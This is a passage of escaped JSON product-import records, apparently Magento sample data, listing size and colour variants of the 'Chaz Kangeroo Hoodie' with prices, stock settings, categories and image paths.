variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},{\"sku\":\"MH01-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-S-Gray\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},{\"sku\":\"MH01-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-S-Orange\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},{\"sku\":\"MH01-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-M-Black\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},{\"sku\":\"MH01-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-M-Gray\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},{\"sku\":\"MH01-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-M-Orange\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},{\"sku\":\"MH01-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-L-Black\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},{\"sku\":\"MH01-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-L-Gray\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},{\"sku\":\"MH01-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-L-Orange\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},{\"sku\":\"MH01-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-XL-Black\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\